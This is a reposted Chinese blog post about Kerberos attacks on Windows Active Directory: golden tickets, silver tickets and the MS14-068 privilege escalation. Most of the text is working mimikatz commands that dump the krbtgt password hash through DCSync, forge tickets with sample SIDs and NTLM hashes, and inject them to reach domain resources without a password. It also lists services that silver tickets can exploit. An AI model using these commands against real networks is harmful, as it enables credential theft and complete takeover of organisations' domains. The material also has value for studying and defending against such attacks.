码迷,mamicode.com
首页 > 其他好文 > 详细

黄金票据 白银票据 ms14068

时间:2020-02-06 16:17:21      阅读:969      评论:0      收藏:0      [点我收藏+]

标签:info   nbsp   交互   session   user   成功   pos   目录   生成   

黄金票据

黄金票据的条件要求:
1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot] 
2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value] 
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名

一旦攻击者拥有管理员访问域控制器的权限,就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

 

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出:

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

 

技术图片

 

生成票据 这里可以用aes256 aes128等等

kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

 

技术图片

 

导入票据

 kerberos::ptt ppc.kiribi

 

技术图片

 

klist
klist  purge  删除所有票据
技术图片

 

 mimikatz # kerberos::purge //清空当前凭证 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc 票据文件 //将上一步生成的票据注入到内存中

 

 

 第二种黄金票据

Hash NTLM: b93dba67240e8236cf1ab028034779e2 
aes256_hmac:5c54f6b6d3d4ac4958cf5e04969e60700b69d2285c65ee4e2810e808f4febacc
krbtgt

net group "domain admins" /domain


查看域的SID号
whoami /all
kerberos::purge #清空票据 kerberos::golden /admin:administrator /domain:pp.zhong.czf /sid:S-1-5-21-2461438818-3229013638-4126918765 /krbtgt:b93dba67240e8236cf1ab028034779e2 /ticket:ticket.kirbi kerberos::ptt ticket.kirbi kerberos::tgt(此条命令好像并没有用)

 白银票据

kerberos::golden /admin:zhangsanfeng /domain:qianxiao996.com /id:1108 /sid:S-1-5-21-2461438818-3229013638-4126918765-1108 /target:QIANXIAO996-DM.school.com /rc4:b1e99870ac1230e33233fb54f240f171 /service:LDAP /ptt

 

lsadump::dcsync /dc:QIANXIAO996-DM.qianxiao996.com /domain:qianxiao996.com /user:krbtgt

 总结

 白银票据不与KDC交互,伪造Ticket直接与server进行交互。我们来看一下windows认证的第六步,server接收到客户端的数据包后,使用自己的密码hash解密ticket得出session key,在使用session key解密Authenticator和timestamp即通过验证,所以我们只需要知道server用户的hash就可以伪造出一个ticket,这就是白银票据。
首先,我们访问一个目标机器的C$文件夹

我们来伪造白银票据,获取目标server用户名

获取NTLM Hash

创建票据命令为:

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt

白银票据根据用户hash生成,而且只能根据某些服务创建,可利用的服务如下
服务注释	服务名
WMI	HOST、RPCSS
Powershell Remoteing	HOST、HTTP
WinRM	HOST、HTTP
Scheduled Tasks	HOST
LDAP 、DCSync	LDAP
Windows File Share (CIFS)	CIFS
Windows Remote ServerAdministration Tools	RPCSS、LDAP、CIFS

生成票据

这时候再访问c$,不需要输入密码

0x04 黄金票据分析及利用

第二步中我们收到了AS发送的TGT,由于TGT是使用krbtgt密码hash加密,客户端无法解密,但是如果我们知道了krbtgt的hash,那么就可以直接生成任意用户的TGT,跳过了第一步的认证并可以访问相应的资源,这就是伪造黄金票据。

域控导出krbtgt NTLM Hash

生成黄金票据

kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:golden.ti

在目录下生成了golden.ti票据文件,使用票据

kerberos::ptt golden.ti

这时候生成了一个域管理用户票据,尝试访问其他用户资源,成功,无需验证

 MS14068

    -u 域账号+@+域名称,这里是ts1+@+yunying.lab
    -p 为当前用户的密码,即ts1的密码
    -s 为ts1的SID值,可以通过whoami /all来获参考户的SID值
    -d 为当前域的域控

 技术图片

 

清除缓存导入票据

技术图片

 

技术图片

 

 

 最后

技术图片

清除票据后

技术图片

 

 

技术图片

 

 

 

 

 

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

 

特别注意的是sid不是本地管理员的sid是域用户的sid 千万别弄错了 先net user查看域用户的sid 或者切到域用户登陆 whoami /all查看 方可 其他没什么

 

 参考文献

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

 

 

 

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出:

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

黄金票据 白银票据 ms14068

标签:info   nbsp   交互   session   user   成功   pos   目录   生成   

原文地址:https://www.cnblogs.com/-zhong/p/12269027.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!